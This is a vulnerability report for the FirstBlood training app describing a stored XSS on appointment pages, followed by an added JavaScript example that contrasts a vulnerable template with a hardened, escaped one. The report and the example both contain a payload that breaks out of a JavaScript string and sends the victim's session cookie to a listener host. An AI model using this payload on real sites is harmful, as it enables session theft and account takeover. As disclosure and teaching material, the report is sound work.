FirstBlood-#811 — Stored XSS on /manageappointment.php can lead to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-28, 0xblackbird reported:
Hello! I found out that the message of any appointment gets reflected inside the
Steps to reproduce:
- First of all, we need to book an appointment. To do so, we need to navigate to /book-appointment.php and fill in all the required fields. Enter the following as the message/extra comment and click on Book Appointment:
- Copy your appointment ID and head over to /yourappointments.php, paste your ID in the Appointment ID field and finally, click on Retrieve Appointment.
- Once the page has loaded, you should see a confirm box popup with the domain name
';%0alet url='http://localhost/?cookie=';var y=new XMLHttpRequest();y.open('GET',url%2BencodeURIComponent(document.cookie),true);y.send();//.
Just enter the above payload in the message field and modify your appointment. This will reload your page and you'll need to enter the appointment ID again to retrieve your appointment (or you can just go back and refresh the page).
- After the page has loaded, and the request has been made, you should see a request coming in with the session cookie.
FirstBlood ID: 22
Vulnerability Type: Stored XSS
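The report's payload begins with `';` because the appointment message lands inside a single-quoted JavaScript string literal, so the quote closes the literal and the semicolon ends the statement. The following added example (not FirstBlood's code, nor the reporter's) models that context with a hypothetical page template, runs the decoded payload (the `%0a` and `%2B` of the report are the URL-encoded newline and `+`) against a stubbed `document.cookie` and `XMLHttpRequest`, and shows a hardened rendering that keeps the message inside the literal. The template shape, the cookie value and the sandbox are constructed for the example.

```javascript
// Added example: how the reported payload escapes a JS string literal, and a fix.
// The page template is hypothetical; FirstBlood's real /yourappointments.php is not shown.

// The reporter's payload with the form URL-encoding undone (%0a -> newline, %2B -> '+').
const HOSTILE_MESSAGE =
  "';\nlet url='http://localhost/?cookie=';var y=new XMLHttpRequest();" +
  "y.open('GET',url+encodeURIComponent(document.cookie),true);y.send();//";

// Vulnerable rendering: the message is dropped straight into a JS string literal.
function renderVulnerable(message) {
  return `<script>var message='${message}';confirm(message);</script>`;
}

// Hardened rendering: JSON.stringify emits a valid JS string literal with quotes,
// backslashes and newlines escaped. JSON.stringify does not touch '<' or '>', so
// "</script>" or "<!--" inside the data could still end the script element; the
// extra replaces encode them, as well as the line terminators U+2028/U+2029.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(message) {
  return `<script>var message=${jsStringLiteral(message)};confirm(message);</script>`;
}

// Pull the script body out of the rendered HTML and run it with stubbed browser
// globals, recording every XHR the script opens and every confirm() it shows.
// Returns the list of requests; confirm() messages are appended to `log`.
function executeScriptBody(html, log) {
  const body = html.match(/<script>([\s\S]*)<\/script>/)[1];
  const requests = [];
  const sandbox = {
    document: { cookie: 'PHPSESSID=constructed-session-value' }, // constructed
    confirm: (msg) => { log.push(`confirm:${msg}`); return true; },
    XMLHttpRequest: function () {
      this.open = (method, url) => { requests.push(`${method} ${url}`); };
      this.send = () => {};
    },
    encodeURIComponent,
  };
  new Function(...Object.keys(sandbox), body)(...Object.values(sandbox));
  return requests;
}

// Stand-alone run: the vulnerable template leaks the cookie, the hardened one does not.
const leaked = executeScriptBody(renderVulnerable(HOSTILE_MESSAGE), []);
console.log('vulnerable template sent:', leaked);
const hardenedLog = [];
executeScriptBody(renderHardened(HOSTILE_MESSAGE), hardenedLog);
console.log('hardened template only showed:', hardenedLog);
```

In the vulnerable rendering the trailing `//` of the payload comments out the original `';confirm(message);`, which is why the confirm box from the first proof-of-concept no longer appears once the exfiltration payload is in place; only the request to the attacker's listener is made. Context-aware escaping is the fix; HTML-escaping the message alone would not help inside a script block, since `'` and `;` survive it.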